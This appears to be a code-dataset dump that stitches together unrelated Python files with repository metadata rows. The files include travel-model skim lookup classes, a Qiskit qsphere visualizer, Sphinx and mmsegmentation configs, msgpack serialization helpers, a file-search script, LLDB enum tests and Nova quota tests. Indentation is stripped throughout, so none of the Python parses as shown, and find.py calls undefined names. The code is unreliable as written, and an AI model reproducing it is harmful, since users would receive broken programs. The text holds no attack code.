s = self.skim_dict.lookup(self.df[self.orig_key], self.df[self.dest_key], key)
return pd.Series(s, index=self.df.index)
def reverse(self, key):
"""
return skim value in reverse (d-o) direction
"""
return self.lookup(key, reverse=True)
def max(self, key):
"""
return max skim value in either o-d or d-o direction
"""
assert self.df is not None, "Call set_df first"
s = np.maximum(
self.skim_dict.lookup(self.df[self.dest_key], self.df[self.orig_key], key),
self.skim_dict.lookup(self.df[self.orig_key], self.df[self.dest_key], key)
)
return pd.Series(s, index=self.df.index)
def __getitem__(self, key):
"""
Get the lookup for an available skim object (df and orig/dest and column names implicit)
Parameters
----------
key : hashable
The key (identifier) for the skim object
Returns
-------
impedances: pd.Series with the same index as df
A Series of impedances values from the single Skim with specified key, indexed byt orig/dest pair
"""
return self.lookup(key)
class Skim3dWrapper(object):
"""
This works the same as a SkimWrapper above, except the third dim3 is also supplied,
and a 3D lookup is performed using orig, dest, and dim3.
Parameters
----------
skims: Skims
This is the Skims object to wrap
dim3_key : str
This identifies the column in the dataframe which is used to
select among Skim object using the SECOND item in each tuple (see
above for a more complete description)
"""
def __init__(self, skim_dict, orig_key, dest_key, dim3_key):
"""
Parameters
----------
skim_dict: SkimDict
orig_key: str
name of column of zone_ids in dataframe to use as implicit orig for lookups
dest_key: str
name of column of zone_ids in dataframe to use as implicit dest for lookups
dim3_key: str
name of column of dim3 keys in dataframe to use as implicit third dim3 key for 3D lookups
e.g. string column with time_of_day keys (such as 'AM', 'MD', 'PM', etc.)
"""
self.skim_dict = skim_dict
self.orig_key = orig_key
self.dest_key = dest_key
self.dim3_key = dim3_key
self.df = None
def set_df(self, df):
"""
Set the dataframe
Parameters
----------
df : DataFrame
The dataframe which contains the orig, dest, and dim3 values
Returns
-------
self (to facilitiate chaining)
"""
assert self.orig_key in df, f"orig_key '{self.orig_key}' not in df columns: {list(df.columns)}"
assert self.dest_key in df, f"dest_key '{self.dest_key}' not in df columns: {list(df.columns)}"
assert self.dim3_key in df, f"dim3_key '{self.dim3_key}' not in df columns: {list(df.columns)}"
self.df = df
return self
def __getitem__(self, key):
"""
Get the lookup for an available skim object (df and orig/dest/dim3 and column names implicit)
Parameters
----------
key : hashable
The key (identifier) for this skim object
Returns
-------
impedances: pd.Series with the same index as df
A Series of impedances values from the set of skims with specified base key, indexed by orig/dest/dim3
"""
assert self.df is not None, "Call set_df first"
orig = self.df[self.orig_key].astype('int')
dest = self.df[self.dest_key].astype('int')
dim3 = self.df[self.dim3_key]
skim_values = self.skim_dict.lookup_3d(orig, dest, dim3, key)
return pd.Series(skim_values, self.df.index)
class MazSkimDict(SkimDict):
"""
MazSkimDict provides a facade that allows skim-like lookup by maz orig,dest zone_id
when there are often too many maz zones to create maz skims.
Dependencies: network_los.load_data must have already loaded: taz skim_dict, maz_to_maz_df, and maz_taz_df
It performs lookups from a sparse list of maz-maz od pairs on selected attributes (e.g. WALKDIST)
where accuracy for nearby od pairs is critical. And is backed by a fallback taz skim dict
to return values of for more distant pairs (or for skims that are not attributes in the maz-maz table.)
"""
def __init__(self, skim_tag, network_los, taz_skim_dict):
"""
we need network_los because we have dependencies on network_los.load_data (e.g. maz_to_maz_df, maz_taz_df,
and the fallback taz skim_dict)
We require taz_skim_dict as an explicit parameter to emphasize that we are piggybacking on taz_skim_dict's
preexisting skim_data and skim_info, rather than instantiating duplicate copies thereof.
Note, however, that we override _offset_mapper (called by super.__init__) to create our own
custom self.offset_mapper that maps directly from MAZ zone_ids to TAZ skim array indexes
Parameters
----------
skim_tag: str
network_los: Network_LOS
taz_skim_dict: SkimDict
"""
self.network_los = network_los
super().__init__(skim_tag, taz_skim_dict.skim_info, taz_skim_dict.skim_data)
assert self.offset_mapper is not None # should have been set with _init_offset_mapper
self.dtype = np.dtype(self.skim_info.dtype_name)
self.base_keys = taz_skim_dict.skim_info.base_keys
self.sparse_keys = list(set(network_los.maz_to_maz_df.columns) - {'OMAZ', 'DMAZ'})
self.sparse_key_usage = set()
def _offset_mapper(self):
"""
return an OffsetMapper to map maz zone_ids to taz skim indexes
Specifically, an offset_series with MAZ zone_id index and TAZ skim array offset values
This is called by super().__init__ AFTER
Returns
-------
OffsetMapper
"""
# start with a series with MAZ zone_id index and TAZ zone id values
maz_to_taz = self.network_los.maz_taz_df[['MAZ', 'TAZ']].set_index('MAZ').sort_values(by='TAZ').TAZ
# use taz offset_mapper to create series mapping directly from MAZ to TAZ skim index
taz_offset_mapper = super()._offset_mapper()
maz_to_skim_offset = taz_offset_mapper.map(maz_to_taz)
if isinstance(maz_to_skim_offset, np.ndarray):
maz_to_skim_offset = pd.Series(maz_to_skim_offset, maz_to_taz.index) # bug
# MAZ
# 19062 330 <- The TAZ would be, say, 331, and the offset is 330
# 8429 330
# 9859 331
assert isinstance(maz_to_skim_offset, np.ndarray) or isinstance(maz_to_skim_offset, pd.Series)
if isinstance(maz_to_skim_offset, pd.Series):
offset_mapper = OffsetMapper(offset_series=maz_to_skim_offset)
elif isinstance(maz_to_skim_offset, np.ndarray):
offset_mapper = OffsetMapper(offset_list=maz_to_skim_offset)
return offset_mapper
def get_skim_usage(self):
return self.sparse_key_usage.union(self.usage)
def sparse_lookup(self, orig, dest, key):
"""
Get impedence values for a set of origin, destination pairs.
Parameters
----------
orig : 1D array
dest : 1D array
key : str
skim key
Returns
-------
values : numpy 1D array
"""
self.sparse_key_usage.add(key)
max_blend_distance = self.network_los.max_blend_distance.get(key, 0)
if max_blend_distance == 0:
blend_distance_skim_name = None
else:
blend_distance_skim_name = self.network_los.blend_distance_skim_name
# fixme - remove?
assert not (np.isnan(orig) | np.isnan(dest)).any()
# we want values from mazpairs, where we have them
values = self.network_los.get_mazpairs(orig, dest, key)
is_nan = np.isnan(values)
if max_blend_distance > 0:
# print(f"{is_nan.sum()} nans out of {len(is_nan)} for key '{self.key}")
# print(f"blend_distance_skim_name {self.blend_distance_skim_name}")
backstop_values = super().lookup(orig, dest, key)
# get distance skim if a different key was specified by blend_distance_skim_name
if (blend_distance_skim_name != key):
distance = self.network_los.get_mazpairs(orig, dest, blend_distance_skim_name)
else:
distance = values
# for distances less than max_blend_distance, we blend maz-maz and skim backstop values
# shorter distances have less fractional backstop, and more maz-maz
# beyond max_blend_distance, just use the skim values
backstop_fractions = np.minimum(distance / max_blend_distance, 1)
values = np.where(is_nan,
backstop_values,
backstop_fractions * backstop_values + (1 - backstop_fractions) * values)
elif is_nan.any():
# print(f"{is_nan.sum()} nans out of {len(is_nan)} for key '{self.key}")
if key in self.base_keys:
# replace nan values using simple backstop without blending
backstop_values = super().lookup(orig, dest, key)
values = np.where(is_nan, backstop_values, values)
else:
# FIXME - if no backstop skim, then return 0 (which conventionally means "not available")
values = np.where(is_nan, 0, values)
# want to return same type as backstop skim
values = values.astype(self.dtype)
return values
def lookup(self, orig, dest, key):
"""
Return list of skim values of skims(s) at orig/dest in skim with the specified key (e.g. 'DIST')
Look up in sparse table (backed by taz skims) if key is a sparse_key, otherwise look up in taz skims
For taz skim lookups, the offset_mapper will convert maz zone_ids directly to taz skim indexes.
Parameters
----------
orig: list of orig zone_ids
dest: list of dest zone_ids
key: str
Returns
-------
Numpy.ndarray: list of skim values for od pairs
"""
if key in self.sparse_keys:
# logger.debug(f"MazSkimDict using SparseSkimDict for key '{key}'")
values = self.sparse_lookup(orig, dest, key)
else:
values = super().lookup(orig, dest, key)
return values
class DataFrameMatrix(object):
"""
Utility class to allow a pandas dataframe to be treated like a 2-D array,
indexed by rowid, colname
For use in vectorized expressions where the desired values depend on both a row column selector
e.g. size_terms.get(df.dest_taz, df.purpose)
::
df = pd.DataFrame({'a': [1,2,3,4,5], 'b': [10,20,30,40,50]}, index=[100,101,102,103,104])
dfm = DataFrameMatrix(df)
dfm.get(row_ids=[100,100,103], col_ids=['a', 'b', 'a'])
returns [1, 10, 4]
"""
def __init__(self, df):
"""
Parameters
----------
df - pandas dataframe of uniform type
"""
self.df = df
self.data = df.values
self.offset_mapper = OffsetMapper()
self.offset_mapper.set_offset_list(list(df.index))
self.cols_to_indexes = {k: v for v, k in enumerate(df.columns)}
def get(self, row_ids, col_ids):
"""
Parameters
----------
row_ids - list of row_ids (df index values)
col_ids - list of column names, one per row_id,
specifying column from which the value for that row should be retrieved
Returns
-------
series with one row per row_id, with the value from the column specified in col_ids
"""
# col_indexes = segments.map(self.cols_to_indexes).astype('int')
# this should be faster than map
col_indexes = np.vectorize(self.cols_to_indexes.get)(col_ids)
row_indexes = self.offset_mapper.map(np.asanyarray(row_ids))
not_in_skim = (row_indexes == NOT_IN_SKIM_ZONE_ID)
if not_in_skim.any():
logger.warning(f"DataFrameMatrix: {not_in_skim.sum()} row_ids of {len(row_ids)} not in skim.")
not_in_skim = not_in_skim.values
logger.warning(f"row_ids: {row_ids[not_in_skim]}")
logger.warning(f"col_ids: {col_ids[not_in_skim]}")
raise RuntimeError(f"DataFrameMatrix: {not_in_skim.sum()} row_ids of {len(row_ids)} not in skim.")
assert (row_indexes >= 0).all(), f"{row_indexes}"
result = self.data[row_indexes, col_indexes]
# FIXME - if ids (or col_ids?) is a series, return series with same index?
if isinstance(row_ids, pd.Series):
result = pd.Series(result, index=row_ids.index)
return result
| 35.174877
| 118
| 0.623906
|
284beb5dad4ed08c4cd4b6eb8643f394f5b2233a
| 5,728
|
py
|
Python
|
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
kifumi/qiskit-terra
|
203fca6d694a18824a6b12cbabd3dd2c64dd12ae
|
[
"Apache-2.0"
] | 1
|
2018-11-01T01:35:43.000Z
|
2018-11-01T01:35:43.000Z
|
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
a-amaral/qiskit-terra
|
e73beba1e68de2617046a7e1e9eeac375b61de81
|
[
"Apache-2.0"
] | null | null | null |
qiskit/tools/visualization/interactive/_iplot_qsphere.py
|
a-amaral/qiskit-terra
|
e73beba1e68de2617046a7e1e9eeac375b61de81
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""
Qsphere visualization
"""
from functools import reduce
from string import Template
import sys
import time
import re
import numpy as np
from scipy import linalg
if ('ipykernel' in sys.modules) and ('spyder' not in sys.modules):
try:
from IPython.core.display import display, HTML
except ImportError:
print("Error importing IPython.core.display")
def iplot_qsphere(rho, options=None):
""" Create a Q sphere representation.
Graphical representation of the input array, using a Q sphere for each
eigenvalue.
Args:
rho (array): Density matrix (complex array)
options (dict): Representation settings containing
- width (integer): graph horizontal size
- height (integer): graph vertical size
"""
# HTML
html_template = Template("""
<p>
<div id="content_$divNumber" style="position: absolute; z-index: 1;">
<div id="qsphere_$divNumber"></div>
</div>
</p>
""")
# JavaScript
javascript_template = Template("""
<script>
requirejs.config({
paths: {
qVisualization: "https://qvisualization.mybluemix.net/q-visualizations"
}
});
require(["qVisualization"], function(qVisualizations) {
data = $data;
qVisualizations.plotState("qsphere_$divNumber",
"qsphere",
data,
$options);
});
</script>
""")
if not options:
options = {}
qspheres_data = []
# Process data and execute
num = int(np.log2(len(rho)))
# get the eigenvectors and egivenvalues
weig, stateall = linalg.eigh(rho)
for _ in range(2**num):
# start with the max
probmix = weig.max()
prob_location = weig.argmax()
if probmix > 0.001:
# print("The " + str(k) + "th eigenvalue = " + str(probmix))
# get the max eigenvalue
state = stateall[:, prob_location]
loc = np.absolute(state).argmax()
# get the element location closes to lowest bin representation.
for j in range(2**num):
test = np.absolute(np.absolute(state[j]) -
np.absolute(state[loc]))
if test < 0.001:
loc = j
break
# remove the global phase
angles = (np.angle(state[loc]) + 2 * np.pi) % (2 * np.pi)
angleset = np.exp(-1j*angles)
state = angleset*state
state.flatten()
spherepoints = []
for i in range(2**num):
# get x,y,z points
element = bin(i)[2:].zfill(num)
weight = element.count("1")
number_of_divisions = n_choose_k(num, weight)
weight_order = bit_string_index(element)
angle = weight_order * 2 * np.pi / number_of_divisions
zvalue = -2 * weight / num + 1
xvalue = np.sqrt(1 - zvalue**2) * np.cos(angle)
yvalue = np.sqrt(1 - zvalue**2) * np.sin(angle)
# get prob and angle - prob will be shade and angle color
prob = np.real(np.dot(state[i], state[i].conj()))
angles = (np.angle(state[i]) + 2 * np.pi) % (2 * np.pi)
qpoint = {
'x': xvalue,
'y': yvalue,
'z': zvalue,
'prob': prob,
'phase': angles
}
spherepoints.append(qpoint)
# Associate all points to one sphere
sphere = {
'points': spherepoints,
'eigenvalue': probmix
}
# Add sphere to the spheres array
qspheres_data.append(sphere)
weig[prob_location] = 0
div_number = str(time.time())
div_number = re.sub('[.]', '', div_number)
html = html_template.substitute({
'divNumber': div_number
})
javascript = javascript_template.substitute({
'data': qspheres_data,
'divNumber': div_number,
'options': options
})
display(HTML(html + javascript))
def n_choose_k(n, k):
"""Return the number of combinations for n choose k.
Args:
n (int): the total number of options .
k (int): The number of elements.
Returns:
int: returns the binomial coefficient
"""
if n == 0:
return 0
return reduce(lambda x, y: x * y[0] / y[1],
zip(range(n - k + 1, n + 1),
range(1, k + 1)), 1)
def bit_string_index(text):
"""Return the index of a string of 0s and 1s."""
n = len(text)
k = text.count("1")
assert text.count("0") == n - k, "s must be a string of 0 and 1"
ones = [pos for pos, char in enumerate(text) if char == "1"]
return lex_index(n, k, ones)
def lex_index(n, k, lst):
"""Return the lex index of a combination..
Args:
n (int): the total number of options .
k (int): The number of elements.
lst (list): list
Returns:
int: returns int index for lex order
"""
assert len(lst) == k, "list should have length k"
comb = list(map(lambda x: n - 1 - x, lst))
dualm = sum([n_choose_k(comb[k - 1 - i], i + 1) for i in range(k)])
return int(dualm)
| 29.525773
| 87
| 0.523568
|
7fd5ae41a45a871cfd0172a5717c98e30df2d4de
| 1,983
|
py
|
Python
|
docs_src/source/conf.py
|
introkun/qt-range-slider
|
7c1500b7bfd6a4433ab474974ed2148f4d570516
|
[
"MIT"
] | 1
|
2021-09-29T14:33:27.000Z
|
2021-09-29T14:33:27.000Z
|
docs_src/source/conf.py
|
OBITORASU/qt-range-slider
|
a0e5b4137404acecd771928587a57c1d7a2168d2
|
[
"MIT"
] | 41
|
2021-01-20T21:14:09.000Z
|
2022-03-28T05:22:01.000Z
|
docs_src/source/conf.py
|
OBITORASU/qt-range-slider
|
a0e5b4137404acecd771928587a57c1d7a2168d2
|
[
"MIT"
] | 2
|
2021-01-22T07:19:37.000Z
|
2021-04-20T16:20:01.000Z
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
sys.setrecursionlimit(1500)
# -- Project information -----------------------------------------------------
project = 'qt-range-slider'
copyright = '2021, Sergey G'
author = 'Sergey G'
# The full version, including alpha/beta/rc tags
release = '0.1.5'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
| 34.789474
| 80
| 0.66818
|
c27cbaedf07e56f7500864ba7d8946d55b6b8239
| 219
|
py
|
Python
|
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | 26
|
2020-01-09T14:28:28.000Z
|
2020-08-09T08:03:08.000Z
|
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
jqueguiner/haven
|
7b2a5d46b08f48f1112f8903f1b97c6adadff3f4
|
[
"Apache-2.0"
] | 6
|
2020-02-11T19:43:50.000Z
|
2020-05-12T01:59:59.000Z
|
from .haven import haven_utils
from .haven import haven_results
from .haven import haven_jupyter
from .haven import haven_exps
from .haven import haven_chk
from .haven import haven_img
from .haven import haven_dropbox
| 24.333333
| 32
| 0.835616
|
c039b51732212190cef5f76d6d9aba6e1962511f
| 1,833
|
py
|
Python
|
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
bouser/helpers/msgpack_helpers.py
|
MarsStirner/bouser
|
33bf759448fec4340581f1cc44e7b0b23a2c4e7a
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import msgpack
__author__ = 'viruzzz-kun'
__created__ = '05.04.2015'
class Serializable(object):
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
self.__dict__ = state
def __encode_hook(obj):
if isinstance(obj, set):
return msgpack.ExtType(0, dump(sorted(obj)))
elif isinstance(obj, Serializable):
return msgpack.ExtType(
1,
dump([
obj.__module__,
obj.__class__.__name__,
obj.__getstate__(),
]))
elif hasattr(obj, '__dict__'):
return msgpack.ExtType(
2,
dump([
obj.__module__,
obj.__class__.__name__,
obj.__dict__,
]))
elif hasattr(obj, '__slots__'):
return msgpack.ExtType(
3,
dump([
obj.__module__,
obj.__class__.__name__,
[getattr(obj, key) for key in obj.__slots__],
]))
return obj
def __ext_hook(code, data):
if code == 0:
return set(load(data))
elif code in (1, 2, 3):
mod, klass, state = load(data)
module = __import__(mod, globals(), locals(), [klass])
obj = getattr(module, klass)()
if code == 1:
obj.__setstate__(state)
elif code == 2:
obj.__dict__ = state
elif code == 3:
for key, value in zip(obj.__slots__, state):
setattr(obj, key, value)
return obj
return msgpack.ExtType(code, data)
def load(chunk, **kwargs):
return msgpack.unpackb(chunk, ext_hook=__ext_hook, encoding='utf-8', **kwargs)
def dump(o):
return msgpack.packb(o, default=__encode_hook, use_bin_type=True)
| 25.816901
| 82
| 0.541735
|
64070a324a74c4673a96125f39182f87894e3897
| 250
|
py
|
Python
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
sandylaker/mmsegmentation
|
1c96a89472804a1e7d4c4cbe8cd980617345d6c9
|
[
"Apache-2.0"
] | 5
|
2021-07-10T06:53:14.000Z
|
2021-12-20T09:52:48.000Z
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
JPLAY0/mmsegmentation
|
b46bbfdeed127b1cab325f707c090014f9333c11
|
[
"Apache-2.0"
] | 2
|
2021-04-01T01:47:08.000Z
|
2022-03-18T05:10:53.000Z
|
configs/unet/fcn_unet_s5-d16_128x128_40k_stare.py
|
JPLAY0/mmsegmentation
|
b46bbfdeed127b1cab325f707c090014f9333c11
|
[
"Apache-2.0"
] | 1
|
2022-02-23T15:54:47.000Z
|
2022-02-23T15:54:47.000Z
|
_base_ = [
'../_base_/models/fcn_unet_s5-d16.py', '../_base_/datasets/stare.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_40k.py'
]
test_cfg = dict(crop_size=(128, 128), stride=(85, 85))
evaluation = dict(metric='mDice')
| 35.714286
| 73
| 0.676
|
ef746c4e6487de08be9034efadb6509247ef8f42
| 973
|
py
|
Python
|
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
old/find.py
|
ericsson-intern/mavenbox
|
9c8c0658fdefeff63444e817c6ca98b3c7c34fff
|
[
"Apache-2.0"
] | null | null | null |
import shutil as fs
import os
def search_files(directory='.', extension='', callback=()):
extension = extension.lower()
for dirpath, dirnames, files in os.walk(directory):
for name in files:
if extension and name.lower().endswith(extension):
callback(dirpath, name)
elif not extension:
print(os.path.join(dirpath, name))
def p(a,b):
print(a,b)
search_files('pom','xml',p)
def main(*args):
syntax = """Syntax: %s [%s] [command arguments]""" % (
os.path.basename(args[0]), "|".join(commands.keys()))
len(args) < 2 and usage(syntax)
program_name, command_name = args[:2]
arguments = args[2:]
try:
fun = commands[command_name]
except KeyError:
raise NoSuchCommandError("No such command: %s" % command_name)
validate_arguments(fun, arguments, name=command_name)
result = fun(*arguments)
if __name__ == "__main__":
main(*sys.argv)
| 24.325
| 70
| 0.614594
|
a8a2f5f6b1bdbb09ec4f3d3cc6d66af901cec240
| 5,593
|
py
|
Python
|
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
nathawes/swift-lldb
|
3cbf7470e0f9191ec1fc1c69ce8048c1dc64ec77
|
[
"Apache-2.0"
] | 2
|
2019-05-24T14:10:24.000Z
|
2019-05-24T14:27:38.000Z
|
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
enterstudio/swift-lldb
|
af85d636d230da2460f91938b1ff734b0fb64b42
|
[
"Apache-2.0"
] | null | null | null |
packages/Python/lldbsuite/test/lang/cpp/enum_types/TestCPP11EnumTypes.py
|
enterstudio/swift-lldb
|
af85d636d230da2460f91938b1ff734b0fb64b42
|
[
"Apache-2.0"
] | null | null | null |
"""Look up enum type information and check for correct display."""
from __future__ import print_function
import os
import time
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
import lldbsuite.test.lldbutil as lldbutil
class CPP11EnumTypesTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int8_t(self):
"""Test C++11 enumeration class types as int8_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int8_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int16_t(self):
"""Test C++11 enumeration class types as int16_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int16_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int32_t(self):
"""Test C++11 enumeration class types as int32_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int32_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_int64_t(self):
"""Test C++11 enumeration class types as int64_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=int64_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint8_t(self):
"""Test C++11 enumeration class types as uint8_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint8_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint16_t(self):
"""Test C++11 enumeration class types as uint16_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint16_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint32_t(self):
"""Test C++11 enumeration class types as uint32_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint32_t"'})
self.image_lookup_for_enum_type()
@expectedFailureAll(oslist=['freebsd'], bugnumber='llvm.org/pr36527')
@skipIf(dwarf_version=['<', '4'])
def test_uint64_t(self):
"""Test C++11 enumeration class types as uint64_t types."""
self.build(
dictionary={
'CFLAGS_EXTRAS': '"-DTEST_BLOCK_CAPTURED_VARS=uint64_t"'})
self.image_lookup_for_enum_type()
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.line = line_number('main.cpp', '// Set break point at this line.')
def image_lookup_for_enum_type(self):
"""Test C++11 enumeration class types."""
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Break inside the main.
bkpt_id = lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# Look up information about the 'DayType' enum type.
# Check for correct display.
self.expect("image lookup -t DayType", DATA_TYPES_DISPLAYED_CORRECTLY,
patterns=['enum( struct| class)? DayType {'],
substrs=['Monday',
'Tuesday',
'Wednesday',
'Thursday',
'Friday',
'Saturday',
'Sunday',
'kNumDays',
'}'])
enum_values = ['-4',
'Monday',
'Tuesday',
'Wednesday',
'Thursday',
'Friday',
'Saturday',
'Sunday',
'kNumDays',
'5']
bkpt = self.target().FindBreakpointByID(bkpt_id)
for enum_value in enum_values:
self.expect(
"frame variable day",
'check for valid enumeration value',
substrs=[enum_value])
lldbutil.continue_to_breakpoint(self.process(), bkpt)
| 37.790541
| 82
| 0.57411
|
02781a7cd5f986c0787fc3b615769548146b294e
| 6,583
|
py
|
Python
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 7
|
2015-09-22T11:27:16.000Z
|
2015-11-02T12:33:46.000Z
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 2
|
2015-09-07T22:14:46.000Z
|
2020-08-12T08:51:56.000Z
|
nova/tests/unit/objects/test_quotas.py
|
gabriel-samfira/nova
|
5ef07cc04dbf0216452ae358e57d9ddac51f1803
|
[
"Apache-2.0"
] | 4
|
2017-06-23T07:37:43.000Z
|
2020-12-28T09:57:22.000Z
|
# Copyright 2013 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import context
from nova.objects import quotas as quotas_obj
from nova import quota
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_objects
QUOTAS = quota.QUOTAS
class TestQuotasModule(test.NoDBTestCase):
def setUp(self):
super(TestQuotasModule, self).setUp()
self.context = context.RequestContext('fake_user1', 'fake_proj1')
self.instance = fake_instance.fake_db_instance(
project_id='fake_proj2', user_id='fake_user2')
def test_ids_from_instance_non_admin(self):
project_id, user_id = quotas_obj.ids_from_instance(
self.context, self.instance)
self.assertEqual('fake_user2', user_id)
self.assertEqual('fake_proj1', project_id)
def test_ids_from_instance_admin(self):
project_id, user_id = quotas_obj.ids_from_instance(
self.context.elevated(), self.instance)
self.assertEqual('fake_user2', user_id)
self.assertEqual('fake_proj2', project_id)
class _TestQuotasObject(object):
def setUp(self):
super(_TestQuotasObject, self).setUp()
self.context = context.RequestContext('fake_user1', 'fake_proj1')
self.instance = fake_instance.fake_db_instance(
project_id='fake_proj2', user_id='fake_user2')
def test_from_reservations(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations)
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertIsNone(quotas.project_id)
self.assertIsNone(quotas.user_id)
def test_from_reservations_bogus(self):
fake_reservations = [_TestQuotasObject, _TestQuotasObject]
self.assertRaises(ValueError,
quotas_obj.Quotas.from_reservations,
self.context, fake_reservations)
def test_from_reservations_instance(self):
fake_reservations = ['1', '2']
quotas = quotas_obj.Quotas.from_reservations(
self.context, fake_reservations,
instance=self.instance)
self.assertEqual(self.context, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('fake_proj1', quotas.project_id)
self.assertEqual('fake_user2', quotas.user_id)
def test_from_reservations_instance_admin(self):
fake_reservations = ['1', '2']
elevated = self.context.elevated()
quotas = quotas_obj.Quotas.from_reservations(
elevated, fake_reservations,
instance=self.instance)
self.assertEqual(elevated, quotas._context)
self.assertEqual(fake_reservations, quotas.reservations)
self.assertEqual('fake_proj2', quotas.project_id)
self.assertEqual('fake_user2', quotas.user_id)
